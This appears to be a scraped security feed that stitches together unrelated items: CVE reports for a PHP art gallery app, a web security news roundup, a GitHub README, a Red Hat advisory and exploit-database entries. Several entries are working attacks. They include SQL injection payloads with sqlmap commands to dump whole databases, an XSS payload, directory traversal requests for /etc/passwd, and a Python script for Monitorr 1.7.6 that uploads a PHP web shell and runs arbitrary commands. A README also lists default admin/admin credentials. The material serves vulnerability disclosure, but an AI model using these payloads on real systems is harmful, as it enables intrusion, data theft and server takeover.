Art Gallery Management System Project v1.0 was discovered to contain a SQL injection vulnerability via the cid parameter at product.php.

\> \[Suggested description\] > Art Gallery Management System Project v1.0 was discovered to contain a > SQL injection vulnerability via the cid parameter at product.php. > > ------------------------------------------ > > \[Additional Information\] > Steps to Reproduce: > 1. Navigate to the product page by clicking on the "ART TYPE" by selecting any of the categories on the menu. > 2. Now insert a single quote ( ' ) on "cid" parameter to break the database query, you will see the output is not shown. > 3. Now inject the payload double single quote ('') in the "cid" parameter to merge the > database query and after sending this request the SQL query is successfully performed and the product is shown in the output. > 4. Now find how many columns are returned by the SQL query. this query will return 6 columns. > Payload:cid=1%27order%20by%206%20--%20-&artname=Sculptures > 5. for manually getting data from the database insert the below payload to see the user of the database. > payload: cid=-2%27union%20select%201,2,3,user(),5,6--%20-&artname=Serigraphs > 6. for automation using "SQLMAP" intercept the request and copy this request to a file called "request.txt". > 7. now to get all database data use the below "sqlmap" command to fetch all the data. > Command: sqlmap -r request.txt -p cid --dump-all --batch > > //////// request.txt file //////// > > GET /Art-Gallery-MS-PHP/product.php?cid=2&&artname=Serigraphs HTTP/1.1 > Host: localhost > sec-ch-ua: "Chromium";v="103", ".Not/A)Brand";v="99" > sec-ch-ua-mobile: ?0 > sec-ch-ua-platform: "Windows" > Upgrade-Insecure-Requests: 1 > User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.5060.114 Safari/537.36 > Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,\*/\*;q=0.8,application/signed-exchange;v=b3;q=0.9 > Sec-Fetch-Site: none > Sec-Fetch-Mode: navigate > Sec-Fetch-User: ?1 > Sec-Fetch-Dest: document > Accept-Encoding: gzip, deflate > Accept-Language: en-US,en;q=0.9 > Cookie: PHPSESSID=hub8pub9s5c1j18cva9594af3q > Connection: close > > ------------------------------------------ > > \[Vulnerability Type\] > SQL Injection > > ------------------------------------------ > > \[Vendor of Product\] > https://phpgurukul.com/ > > ------------------------------------------ > > \[Affected Product Code Base\] > Art Gallery Management System Project - Art Gallery Management System Project - V 1.0 > > ------------------------------------------ > > \[Affected Component\] > http://localhost/Art-Gallery-MS-PHP/product.php?cid=2&artname=Serigraphs > > ------------------------------------------ > > \[Attack Type\] > Remote > > ------------------------------------------ > > \[Impact Code execution\] > true > > ------------------------------------------ > > \[Impact Escalation of Privileges\] > true > > ------------------------------------------ > > \[Impact Information Disclosure\] > true > > ------------------------------------------ > > \[Attack Vectors\] > SQL injection attacks can have serious consequences for both the website and its users. If an attacker is able to successfully inject malicious code into a database, they can potentially extract sensitive data such as passwords, credit card numbers, and personal information. This can result in the theft of sensitive data, as well as damage to the website's reputation and credibility. > > SQL injection attacks can be used to perform a variety of malicious actions, including: > 1. Extracting sensitive data from the database, such as passwords, financial information, or personal information > 2. Modifying or deleting data from the database, potentially causing incorrect results or system failures > 3. Executing arbitrary commands on the database server, such as shutting down the server or creating new user accounts > 4. Gaining unauthorized access to the underlying operating system and taking complete control of the server > > ------------------------------------------ > > \[Reference\] > https://phpgurukul.com/art-gallery-management-system-using-php-and-mysql/ > https://phpgurukul.com/projects/Art-Gallery-MS-PHP.zip > > ------------------------------------------ > > \[Discoverer\] > Rahul Patwari Use CVE-2023-23162.

CVE-2023-23162: CVE/CVE-2023-23162.txt at main · rahulpatwari/CVE

A reflected cross-site scripting (XSS) vulnerability in Art Gallery Management System Project v1.0 allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the artname parameter under ART TYPE option in the navigation bar.

\> \[Suggested description\] > A reflected cross-site scripting (XSS) vulnerability in Art Gallery > Management System Project v1.0 allows attackers to execute arbitrary > web scripts or HTML via a crafted payload injected into the artname > parameter under ART TYPE option in the navigation bar. > > ------------------------------------------ > > \[Additional Information\] > Steps to Reproduce: > 1. Navigate to the Products page by clicking on "ART TYPE". > 4. Now insert the XSS payload and click on "artname" parameter in the URL and click on ENTER to submit the request. Payload: <img%20src=1%20onerror=alert(document.domain)> > 5. After clicking on ENTER the XSS payload is executed and the alert Pops up with the domain name. > > ############ Product Page Request ############ > > GET /Art-Gallery-MS-PHP/product.php?cid=1&&artname=%3Cimg%20src=1%20onerror=alert(document.domain)%3E HTTP/1.1 > Host: localhost > Cache-Control: max-age=0 > sec-ch-ua: "Chromium";v="103", ".Not/A)Brand";v="99" > sec-ch-ua-mobile: ?0 > sec-ch-ua-platform: "Windows" > Upgrade-Insecure-Requests: 1 > User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.5060.114 Safari/537.36 > Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,\*/\*;q=0.8,application/signed-exchange;v=b3;q=0.9 > Sec-Fetch-Site: none > Sec-Fetch-Mode: navigate > Sec-Fetch-User: ?1 > Sec-Fetch-Dest: document > Accept-Encoding: gzip, deflate > Accept-Language: en-US,en;q=0.9 > Cookie: PHPSESSID=hub8pub9s5c1j18cva9594af3q > Connection: close > > ------------------------------------------ > > \[Vulnerability Type\] > Cross Site Scripting (XSS) > > ------------------------------------------ > > \[Vendor of Product\] > https://phpgurukul.com/ > > ------------------------------------------ > > \[Affected Product Code Base\] > Art Gallery Management System Project - Art Gallery Management System Project - V 1.0 > > ------------------------------------------ > > \[Affected Component\] > http://localhost/Art-Gallery-MS-PHP/product.php?cid=1&&artname=Sculptures > > ------------------------------------------ > > \[Attack Type\] > Remote > > ------------------------------------------ > > \[Impact Code execution\] > true > > ------------------------------------------ > > \[Impact Escalation of Privileges\] > true > > ------------------------------------------ > > \[Impact Information Disclosure\] > true > > ------------------------------------------ > > \[Attack Vectors\] > Cross-Site Scripting (XSS) is a type of vulnerability that allows an attacker to inject malicious code into a website. This code is executed by the victim's web browser, allowing the attacker to steal sensitive information such as login credentials, or to manipulate the content of the website for malicious purposes. > XSS attacks can we used to perform a variety of malicious actions including: > 1. Stealing sensitive information > 2. Redirecting the victim to another webpage > 3. Executing arbitrary code > 4. Manipulating the appearance of the website > > ------------------------------------------ > > \[Reference\] > https://phpgurukul.com/art-gallery-management-system-using-php-and-mysql/ > https://phpgurukul.com/projects/Art-Gallery-MS-PHP.zip > > ------------------------------------------ > > \[Discoverer\] > Rahul Patwari Use CVE-2023-23161.

CVE-2023-23161: CVE/CVE-2023-23161.txt at main · rahulpatwari/CVE

Art Gallery Management System Project v1.0 was discovered to contain a SQL injection vulnerability via the editid parameter.

\> \[Suggested description\] > Art Gallery Management System Project v1.0 was discovered to contain a > SQL injection vulnerability via the editid parameter. > > ------------------------------------------ > > \[Additional Information\] > Step To Reproduce: > > 1. navigate to admin login page and login with the valid username and password<admin:Test@123>. > URL: http://localhost/Art-Gallery-MS-PHP/admin/login.php > 2. Now navigate "Manage ART TYPE" by clicking on "ART TYPE" option on left side bar. > 3. Now click on any of the Art Type "Edit" button and you will redirect to the edit page of art type. > 4. Now insert a single quote ( ' ) on "editid" parameter to break the database query, you will see the output is not shows. > > 3. Now inject the payload double single quote ('') in the "editid" parameter to merge the > database query and after sending this request the SQL query is successfully performed and product is shows in the output. > > 4. Now find how many column are returns by the SQL query. this query will return 6 column. > Payload:editid=6%27order%20by%203%20--%20- > > 5. for manually get data of database insert the below payload to see the user of the database. > payload: editid=-6%27union%20all%20select%201,user(),3--%20- > > 6.now to get all database data use below "sqlmap" command to fetch all the data. > Command: sqlmap http://localhost/Art-Gallery-MS-PHP/admin/edit-art-type-detail.php?editid=6 --cookie="PHPSESSID=hub8pub9s5c1j18cva9594af3q" --dump-all --batch > > ------------------------------------------ > > \[Vulnerability Type\] > SQL Injection > > ------------------------------------------ > > \[Vendor of Product\] > https://phpgurukul.com/ > > ------------------------------------------ > > \[Affected Product Code Base\] > Art Gallery Management System Project in PHP - Art Gallery Management System Project in PHP - V 1.0 > > ------------------------------------------ > > \[Affected Component\] > http://localhost/Art-Gallery-MS-PHP/admin/edit-art-type-detail.php?editid=1 > > ------------------------------------------ > > \[Attack Type\] > Remote > > ------------------------------------------ > > \[Impact Code execution\] > true > > ------------------------------------------ > > \[Impact Escalation of Privileges\] > true > > ------------------------------------------ > > \[Impact Information Disclosure\] > true > > ------------------------------------------ > > \[Attack Vectors\] > SQL Injection (SQLi) is a type of injection attack that makes it possible to execute malicious SQL statements. an attacker can go around authentication and authorization of a web page or web application and retrieve the content of the entire SQL database. They can also use SQL Injection to add, modify, and delete records in the database. > > SQL injection attacks can be used to perform a variety of malicious actions, including: > 1. Extracting sensitive data from the database, such as passwords, financial information, or personal information. > 2. Modifying or deleting data from the database, potentially causing incorrect results or system failures. > 3. Executing arbitrary commands on the database server, such as shutting down the server or creating new user accounts. > 4. Gaining unauthorized access to the underlying operating system and taking complete control of the server. > > ------------------------------------------ > > \[Reference\] > https://phpgurukul.com/art-gallery-management-system-using-php-and-mysql/ > https://phpgurukul.com/projects/Art-Gallery-MS-PHP.zip > > ------------------------------------------ > > \[Discoverer\] > Rahul Patwari Use CVE-2023-23163.

CVE-2023-23163: CVE/CVE-2023-23163.txt at main · rahulpatwari/CVE

Your fortnightly rundown of AppSec vulnerabilities, new hacking techniques, and other cybersecurity news

John Leyden 10 February 2023 at 16:30 UTC

Your fortnightly rundown of AppSec vulnerabilities, new hacking techniques, and other cybersecurity news

KeePass has become the latest password manager utility obliged to defend its reputation following the discovery of an alleged vulnerability.

Security researchers warned that it might be possible to set up a trigger that exports everything from the KeePass database in cleartext, before syphoning off secret data. The vulnerability – whose seriousness is disputed – is being tracked as CVE-2023-24055.

As Bleeping Computer reports, KeePass maintains the issue only comes into play in cases where an attacker already has control of a compromised account – in which case it’s ‘game over’ already.

Issues in password managers have been a particular focus for security researchers since a mishandled security incident involving LastPass last year that eventually prompted the vendor to admit encrypted password vaults had leaked.

Master keys for these vaults were not exposed, limiting the scope for harm, but the affair was nonetheless troubling.

The US Cybersecurity and Infrastructure Security Agency (CISA) is pushing plans to require technology manufacturers to make their products secure by design.

CISA director Jen Easterly and executive assistant director Eric Goldstein outlined the proposals in an essay published by Foreign Affairs magazine.

On Thursday, developers of the OpenSSL project released patches covering a variety of vulnerabilities in the encryption library, including a high impact flaw (tracked as CVE-2023-0286). The flaw meant that sophisticated attackers might be able to either read system memory or cause a denial of service on affected systems.

Thursday also brought news that a sysadmin on Reddit had fallen victim to a phishing attack. The social news site admitted that attackers had “gained access to some internal documents, code, and some internal business systems” while stating that it reckoned “Reddit user passwords and accounts are safe”.

The Daily Swig also recently reported that Google has developed proposals to mitigate the impact of prototype pollution (a class of JavaScript vulnerability), how a security researcher hacked into Toyota’s supplier management network, and on a privacy storm involving a new host of popular pen testing tool XSS Hunter since the last edition of Deserialized. You can catch up with the full range of our recent news coverage by visiting The Daily Swig’s homepage.

Here are some more web security stories and other cybersecurity news that caught our attention in the last fortnight:

**Web Vulnerabilities**

*   Cisco devices / Technology to deploy application containers/virtual machines directly on devices was flawed because user input for the ‘DHCP Client ID’ option wasn’t sanitized / Disclosed with patch on February 1
*   Dompdf / Critical / URI validation failure on SVG parsing / URI validation can be bypassed on SVG parsing, potentially leading to arbitrary object unserialize on PHP, through the phar URL wrapper / disclosed with patch last week
*   F5 BIG-IP / High / Format string flaw in iControl SOAP allows an authenticated attacker to crash the iControl SOAP CGI process or, potentially, execute arbitrary code / Disclosed with a patch on February 1
*   Jira Service Management Server and Data Center / Critical / Broken authentication / vendor alert and patch issued on February 1
*   Skyhigh Security Secure Web Gateway / High / XSS in single sign-on plugin / Disclosed with a patch on January 26

**Research and attack techniques**

*   A detailed analysis of a remote source disclosure vulnerability in PHP development server offers pointers towards necessary follow-up work. The flaw – which meant that the source code of PHP files was exposed as if they were static files – was resolved, but even so “Shodan queries reveal many exposed instances of the built-in server”, the researchers warn
*   A vulnerability in Zoho ManageEngine’s SAML (Security Assertion Markup Language) implementation – dubbed SAML ShowStopper – leaves enterprise-based SSO (Single-Sign-On) deployments at a heightened risk of attack. Security researcher Khoa Dinh offers a detailed analysis of flaw in warning that any vendors (not just ManageEngine) relying on older versions of xmlsec and xalan might be at similar risk
*   A blog post by Skylight Cyber details common misconfigurations in the SaltStack IT orchestration platform, as encountered in the wild, as well as detailing a “novel template injection technique that can achieve remote code execution on a salt-master (or master-of-masters) server”.
*   Proofpoint has discovered that attackers are using malicious third-party OAuth apps to infiltrate organizations’ cloud environments. “Threat actors satisfied Microsoft’s requirements for third-party OAuth apps by abusing the Microsoft ‘verified publisher’ status,” the security researchers report
*   Researchers from Ermetic have discovered an RCE vulnerability impacting services such as Function Apps, App Service and Logic Apps on Azure cloud. The EmojiDeploy vulnerability was sprung through CSRF against source control management service (SCM) Kudu
*   Security researcher ‘eta’ has successfully reverse-engineered the encoding process for barcodes associated with UK mobile rail tickets. The work allows interested parties to decode their own tickets with a web tool developed by the researcher

**Bug bounty / vulnerability disclosure**

*   Google has expanded its OSS-Fuzz project, a free platform for continuous fuzzing to critical open source projects. The technology, which has helped to identify 8,800 vulnerabilities across 850 projects since its launch in 2016, is getting a boost through the offer of higher financial rewards for contributors that integrate new projects into OSS-Fuzz.
*   Security researcher Youssef Sammouda claimed a $44,500 payout after discovering a security flaw that made it possible to take over Facebook/Oculus accounts. As explained in a technical write-up by Sammouda, the hack relied on First-Party access\_token stealing.

**New open source infosec/hacking tools**

*   Checkmarx has put together a built-to-be-vulnerable API application based on the OWASP top 10 API vulnerabilities. The utility – dubbed c{api}tal – is designed to be a learning and training resource focused on API security.
*   Ronin 2.0 offers a revamped version of a free and Open Source Ruby toolkit for security research and development. The latest version of Ronin, enhanced with new API libraries, contains many different CLI commands and Ruby libraries optimized to carry out a range of tasks including scanning for web vulnerabilities and running exploits.
*   Developers have released a new version of EMBA – an embedded device firmware security analyzer geared to the needs of penetration testers. Its functionality is explained on a GitHub page.
*   SH1MMER, an exploit capable of completely unenrolling enterprise-managed Chromebooks.

**For devs**

*   Developers should check out an informative post on integrating Nuclei, an open-source tool for scanning web applications, into their GitHub CI/CD pipelines
*   SBOM Scorecard offers a tool that helps developers to quantify what a well-generated SBOM looks like, accessing the richness of metadata that can later be queried
*   The precloud utility offers an open source CLI that runs checks on infrastructure as code to catch potential deployment issues. The tool, which offers dynamic tests for infrastructure-as-code, works by “comparing resources in CDK diffs and Terraform Plans against the state of your cloud account”

**More industry news**

*   US standards body NIST (National Institute of Standards and Technology) has launched a new voluntary framework for the management of AI-associated risk. NIST’s AI Risk Management Framework is designed towards “improving the ability to incorporate trustworthiness considerations into the design, development, use, and evaluation of AI products, services, and systems”.
*   Scammers are buying ads on Google promoting fraudulent sites that pose as login portals for password management tool Bitwarden.

**For fun**

Codebreakers have decoded a cache of more than 500 encoded letters written by Mary, Queen of Scots, during her years of captivity between 1578 and 1584.

The code – made up only of graphical symbols – was cracked using a combination of “computerized cryptanalysis, manual code-breaking, and linguistic and contextual analysis”, Ars Technica reports.

The letters were relayed by secret couriers, principally to the French ambassador, Michel de Castelnau. However Elizabeth I’s spymaster, Francis Walsingham, had a mole in the French embassy who gave the spy access to decoded copies of the correspondence.

A paper on the codebreaking work, likely to help historians researching the period, was published by specialist journal Cryptologia.

PREVIOUS EDITION Deserialized web security roundup: ‘Catastrophic cyber events’, another T-Mobile breach, more LastPass problems

Deserialized web security roundup: KeePass dismisses ‘vulnerability’ report, OpenSSL gets patched, and Reddit admits phishing hack

A stored cross-site scripting (XSS) vulnerability in the component php-inventory-management-system/brand.php of Inventory Management System v1 allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the Brand Name parameter.

**Name already in use**

A tag already exists with the provided branch name. Many Git commands accept both tag and branch names, so creating this branch may cause unexpected behavior. Are you sure you want to create this branch?

**1** branch **0** tags

Code

*   Use Git or checkout with SVN using the web URL.
    
*   Open with GitHub Desktop
*   Download ZIP

**Latest commit**

…efault so there is no need to create after setup

862705a

**Files**Permalink

Failed to load latest commit information.

Type

Name

Latest commit message

Commit time

**Inventory Management System**

Amzing Project on Management System Check Demo Here : https://www.youtube.com/watch?v=9UZM8MmY1T8

\-Open source inventory management system with php and mysql

\-Invoice generation and easy to download invoice in PDF format

\-Lightweight and easy to use

\-Order management and product management can be done with ease

\-Report management

\-User wise sell report.

**Requirement**

    Need to change
    store_url in db_connect.php
    
    Login Credentials
    Id : admin
    password : admin
    

**About**

Open source inventory management system with php and mysql Invoice generation and easy to download invoice in PDF format Lightweight and easy to use Order management and product management can be done with ease Report management User wise sell report.

**Topics****Resources**

Readme

**License**

MIT license

**Stars**

**163** stars

**Watchers**

**25** watching

**Forks**

**99** forks

CVE-2023-24234: GitHub - stemword/php-inventory-management-system: Open source inventory management system with php and mysql Invoice generation and easy to download invoice in PDF format Lightweight and easy to use 

Red Hat Security Advisory 2023-0634-01 - Logging Subsystem 5.6.1 - Red Hat OpenShift. Issues addressed include a denial of service vulnerability.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

====================================================================                     
Red Hat Security Advisory

Synopsis:          Moderate: Red Hat OpenShift (Logging Subsystem) security update  
Advisory ID:       RHSA-2023:0634-01  
Product:           Logging Subsystem for Red Hat OpenShift  
Advisory URL:      https://access.redhat.com/errata/RHSA-2023:0634  
Issue date:        2023-02-09  
CVE Names:         CVE-2021-35065 CVE-2021-46848 CVE-2022-3821  
                   CVE-2022-4883 CVE-2022-35737 CVE-2022-40303  
                   CVE-2022-40304 CVE-2022-42010 CVE-2022-42011  
                   CVE-2022-42012 CVE-2022-42898 CVE-2022-43680  
                   CVE-2022-44617 CVE-2022-46175 CVE-2022-46285  
====================================================================  
1. Summary:

Logging Subsystem 5.6.1 - Red Hat OpenShift

Red Hat Product Security has rated this update as having a security impact  
of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which  
gives a detailed severity rating, is available for each vulnerability from  
the CVE link(s) in the References section.

2. Description:

Logging Subsystem 5.6.1 - Red Hat OpenShift

Security Fix(es):

* glob-parent: Regular Expression Denial of Service (CVE-2021-35065)

* json5: Prototype Pollution in JSON5 via Parse Method (CVE-2022-46175)

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other related information, refer to the CVE  
page(s) listed in the References section.

3. Solution:

Before applying this update, make sure all previously released errata  
relevant to your system have been applied.

For details on how to apply this update, refer to:

https://access.redhat.com/articles/11258

4. Bugs fixed (https://bugzilla.redhat.com/):

2156263 - CVE-2022-46175 json5: Prototype Pollution in JSON5 via Parse Method  
2156324 - CVE-2021-35065 glob-parent: Regular Expression Denial of Service

5. JIRA issues fixed (https://issues.jboss.org/):

LOG-3397 - [Developer Console] "parse error" when testing with normal user  
LOG-3441 - [Administrator Console] Seeing "parse error" while using Severity filter for cluster view user  
LOG-3463 - [release-5.6] ElasticsearchError error="400 - Rejected by Elasticsearch" when adding some labels in application namespaces  
LOG-3477 - [Logging 5.6.0]CLF raises 'invalid: unrecognized outputs: [default]' after adding `default` to outputRefs.  
LOG-3494 - [release-5.6] After querying logs in loki, compactor pod raises many TLS handshake error if retention policy is enabled.  
LOG-3496 - [release-5.6] LokiStack status is still 'Pending' when all loki components are running  
LOG-3510 - [release-5.6] TLS errors on Loki controller pod due to bad certificate

6. References:

https://access.redhat.com/security/cve/CVE-2021-35065  
https://access.redhat.com/security/cve/CVE-2021-46848  
https://access.redhat.com/security/cve/CVE-2022-3821  
https://access.redhat.com/security/cve/CVE-2022-4883  
https://access.redhat.com/security/cve/CVE-2022-35737  
https://access.redhat.com/security/cve/CVE-2022-40303  
https://access.redhat.com/security/cve/CVE-2022-40304  
https://access.redhat.com/security/cve/CVE-2022-42010  
https://access.redhat.com/security/cve/CVE-2022-42011  
https://access.redhat.com/security/cve/CVE-2022-42012  
https://access.redhat.com/security/cve/CVE-2022-42898  
https://access.redhat.com/security/cve/CVE-2022-43680  
https://access.redhat.com/security/cve/CVE-2022-44617  
https://access.redhat.com/security/cve/CVE-2022-46175  
https://access.redhat.com/security/cve/CVE-2022-46285  
https://access.redhat.com/security/updates/classification/#moderate

7. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2023 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIVAwUBY+VrodzjgjWX9erEAQhJHxAAjYeOHe6O2pl6MFdHqTfER/9rMjZqgo6z  
u4AkFcT625z+SEyIHz/xqD41KCkWfDCL0i7MabKHhOnXd5jDhIveFy/kTsNu4Jyb  
DCstNACisLM2B4ytXCkfR7pOj20BZlO5IY14zK+rOPJeu3uF7kKF332ELhvDJQHZ  
9iZa0yLdebgJVjK072WYioQqBHUWus7dkmKTMpbud/TmaMVivVGPhpKo449hJSMI  
8c2K3YMG0Cx1IBfZk1yugGHstNkNP/zAVMyx1jYtfBzfap5xX0djfkanDGtwXGdG  
Qsqhks+tXj1SJdrQMwOXr2D9hETnLz56lYKTd3GF+3qYJiEJ+niJj47f5IBnJSep  
abSduOiaYxzZu8eOwMJ9sD/yrYBPxi2pH8pvDjo5gJ/eRowEFtHeuXbpSPv9+0OP  
Ot5TJVYQaJ7sPKwleFPrB0IE42IXYPACMLwLEYLdq+bZhzsMLr3gAuCfK7oqIx/m  
7V9gAHD13BDU3aJlgAu/KsFxL8SopABcCfbXlktBgFVQF43s9eoGTlUTGPWQ5Stm  
t1SD85kYd5kOQk1qt25X9OLVs6tOeHQeFLOd4UBNf9cmzA2K+jlAEerwayTOHJNW  
H3LRkX/8FA4HFYX4aX0sB38pP3DZyPTeVj++QDQLk+k3y53dFRcfexi7tSeul/bw  
7CsN2+c4hI0=1so9  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Red Hat Security Advisory 2023-0634-01

ChiKoi version 1.0 suffers from a directory traversal vulnerability.

====================================================================================================================================| # Title     : ChiKoi version 1.0 Directory Traversal Vulnerability Vulnerability                                                 || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 65.0(32-bit)                                               | | # Vendor    : https://codeload.github.com/tanhongit/new-mvc-shop/zip/refs/tags/v1.0                                              || # Dork      :                                                                                                                    |====================================================================================================================================poc :[+]  Dorking İn Google Or Other Search Enggine .[+]  infested file : index.php & admin.php<?phpsession_start();require_once('lib/model.php');require_once('lib/functions.php');require_once('content/models/cart.php');require "lib/statistics.php";require "lib/counter.php";// $count_file = 'logs/counter.txt';// $ip_file = 'logs/ip.txt';// function counting_ip()// {//     $ip = $_SERVER['REMOTE_ADDR'];//     global $count_file, $ip_file;//     if (!in_array($ip, file($ip_file, FILE_IGNORE_NEW_LINES))) {//         $current_val = (file_exists($count_file)) ? file_get_contents($count_file) : 0;//         file_put_contents($ip_file, $ip . "\n", FILE_APPEND);//         file_put_contents($count_file, ++$current_val);//     }// }// counting_ip();if (isset($_GET['controller'])) $controller = $_GET['controller'];else $controller = 'home';if (isset($_GET['action'])) $action = $_GET['action'];else $action = 'index';$file = 'content/controllers/' . $controller . '/' . $action . '.php';if (file_exists($file)) {    require($file);} else {    show_404();}[+]  use payload : ../../../../../../../../../etc/passwd[+]  https://127.0.0.1/chikoiquan.tanhongitcom/index.php?action=../../../../../../../../../etc/passwd[+]  https://127.0.0.1/https://chikoiquan.tanhongitcom/admin.php?file=../../../../../../../../../etc/passwd== Greetings to :===========================================================================jericho * Larry W. Cashdollar * brutelogic* hyp3rlinx* 9aylas * shadow_00715 * LiquidWorm* |        ============================================================================================

ChiKoi 1.0 Directory Traversal

Monitorr version 1.7.6 remote shell upload proof of concept exploit written in Python.

    # Exploit Title: Monitorr v1.7.6 - Unauthenticated File upload to Remote Code Execution# Exploit Author: Achuth V P (retrymp3)# Date: February 09, 2023# Vendor Homepage: https://github.com/Monitorr/# Software Link: https://github.com/Monitorr/Monitorr# Tested on: Ubuntu# Version: v1.7.6# Exploit Description: Monitorr v1.7.6 suffers from unauthenticated file upload to remote code execution vulnerability# CVE: CVE-2020-28871import requestsimport randomimport string#from requests.auth import HTTPBasicAuthfrom colorama import (Fore as F, Back as B, Style as S)BR,FT,FR,FG,FY,FB,FM,FC,ST,SD,SB = B.RED,F.RESET,F.RED,F.GREEN,F.YELLOW,F.BLUE,F.MAGENTA,F.CYAN,S.RESET_ALL,S.DIM,S.BRIGHTdef payL():    fileName=''.join(random.choice(string.ascii_lowercase) for i in range(16))+'.php'    tf1=requests.post(url+'/assets/php/upload.php',        files=(            ('fileToUpload', (fileName, 'GIF87a\n<?php\n$var=shell_exec('+'"'+cmd+'"'+');\necho "$var"\n?>')),))    tf2=requests.get(url+'/assets/data/usrimg/'+fileName)    print(tf2.text)def sig():    SIG  = SB+FY+"         "+FR+".-----..___.._____.      "+FY+"\n"    SIG += FY+"         |  ..   >||__-__-_|         \n"    SIG += FY+"         "+FR+"|  |.'  ,||_______          "+FY+"\n"    SIG += FY+"         |    _ < ||__-__-_|"+FR+"*  *  *"+FY+" \n"    SIG += FY+"         |  |\  \ ||__-__-_\n"    SIG += FY+"         "+FR+"|___ \_ \||_______| "+FY+"\n"    SIG += FY+"\n"+"    _____"+FR+"github.com/retrymp3"+FY+"_____\n"+ST    return SIGdef argsetup():    about  = SB+FT+'Monitorr v1.7.6 - Unauthenticated File upload to Remote Code Execution\n'+ST    return aboutif __name__ == "__main__":    header = SB+FT+"\n"+'             '+FR+'retrymp3\n'+ST    print(header)    print(sig())    print(argsetup())    #proxies = {"http": "http://127.0.0.1:8080", "https": "http://127.0.0.1:8080"}    url=input("Enter the base url: ")    cmd=input("Command: ")    payL()

Monitorr 1.7.6 Shell Upload

A vulnerability was found in webbuilders-group silverstripe-kapost-bridge 0.3.3. It has been declared as critical. Affected by this vulnerability is the function index/getPreview of the file code/control/KapostService.php. The manipulation leads to sql injection. The attack can be launched remotely. Upgrading to version 0.4.0 is able to address this issue. The name of the patch is 2e14b0fd0ea35034f90890f364b130fb4645ff35. It is recommended to upgrade the affected component. The associated identifier of this vulnerability is VDB-220471.

CVE-2015-10077

A vulnerability has been found in SourceCodester Medical Certificate Generator App 1.0 and classified as critical. This vulnerability affects unknown code of the file action.php. The manipulation of the argument lastname leads to sql injection. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. VDB-220558 is the identifier assigned to this vulnerability.

Tag

#php